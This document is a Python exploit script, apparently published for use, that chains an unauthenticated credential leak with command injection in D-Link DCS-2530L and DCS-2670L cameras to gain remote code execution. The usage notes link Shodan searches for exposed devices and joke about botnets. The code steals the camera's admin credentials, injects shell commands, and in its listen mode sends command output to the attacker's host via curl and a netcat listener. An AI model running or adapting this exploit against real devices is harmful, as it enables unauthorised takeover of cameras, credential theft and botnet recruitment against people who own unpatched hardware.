D-LINK 0day

1. '''
2. Usage:
3. Copy the url straight from firefox. If you want to get a netcat listener you need netcat installed
4. and the listening port specified within open obviously.
5.  
6. Blind execution - python3 exploit.py http://1.2.3.4/ "curl http://pingb.in/p/xxxxxxxxxxxxxxxxxx"
7. Netcat listener - python3 exploit.py http://1.2.3.4/ "cat /proc/cpuinfo" --listen
8.  
9. Info:
10. By chaining together an unauthenticated credential disclouse 0day in multiple
11. Dlink DCS cameras with an authenticated command injection in ddns_enc.cgi - it
12. is possible to gain RCE.
13.  
14. Confirmed vulnerable:
15. DCS-2530L, DCS-2670L
16. https://www.shodan.io/search?query=DCS-2670L
17. https://www.shodan.io/search?query=DCS-2530L
18.  
19. Limitations:
20. The length of the 'account' parameter is limited to 55 characters. Longer commands
21. can be executed via piping characters with "echo -ne" to a .sh or downloading a .sh
22. from another host.
23.  
24. The payload will be executed every 5 seconds on the host while the payload in the account
25. parameter is set. This exploit triies to auto terminate after 1 execution. Ajust timing if needed.
26.  
27. Patch:
28. Dlink has released an advisory for the DCS-2530L but no patch. Don't port forward the
29. camera until one has been released.
30.  
31. Don't be an ass. Don't brick other people's shit. I'm not responsible for anything lmfao - @dogonsecurity
32. '''
33.  
34. import requests, sys, argparse, time, os
35. from time import sleep
36. from requests import get
37. from urllib3.exceptions import InsecureRequestWarning
38.  
39. def getcreds(host):
40.   try:
41.     r = requests.get(host + "/config/getuser?index=0", verify=False, timeout=5)
42.     data = r.text.split("\n")
43.     credentials = []
44.     credentials.append(data[0].replace("name=", "").replace("\r", ""))
45.     credentials.append(data[1].replace("pass=", "").replace("\r", ""))
46.     return credentials
47.   except Exception as e:
48.     print(e)
49.  
50. def execpayload(host, creds, payload):
51.   try:
52.     url = "/cgi-bin/ddns_enc.cgi?enable=1&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account="
53.     endexec = "/cgi-bin/ddns_enc.cgi?enable=0&hostname=qq&interval=24&servername=www.dlinkddns.com&provider=custom&account=aaaa"
54.     # DEBUG print(payload)
55.     if not args.listen:
56.       payload = "{};{};".format(url,payload)
57.       r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
58.       print("Sent payload... Waiting for execution.")
59.       sleep(4)
60.       r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
61.       print("Blind exploit complete. Did it work :)?")
62.     else:
63.       ourip = get('https://api.ipify.org').text
64.       ourport = 3 #Change if you need to
65.       payload = "{};{} >a;curl -XPUT {}:{} -T a;".format(url,payload,ourip,ourport)
66.       # DEBUG print(payload)
67.       r = requests.get(host + payload , auth=(creds[0], creds[1]), verify=False, timeout=5)
68.       print("Sent payload... Waiting for execution.")
69.       os.system("sudo nc -lvp 3 &")
70.       sleep(7)
71.       r = requests.get(host + endexec , auth=(creds[0], creds[1]), verify=False, timeout=5)
72.       os.system("sudo pkill -f nc")
73.       print("Listening exploit complete.")
74.   except Exception as e:
75.     print(e)
76.  
77. print("Hoho is the future of botnet!!11!!")
78. parser = argparse.ArgumentParser()
79. parser.add_argument("target", help="target",type=str)
80. parser.add_argument("payload", help="payload",type=str)
81. parser.add_argument("--listen", action='store_true')
82. args = parser.parse_args()
83.  
84. requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
85. creds = getcreds(args.target)
86. print("Got credentials: " + str(creds))
87. execpayload(args.target, creds, args.payload)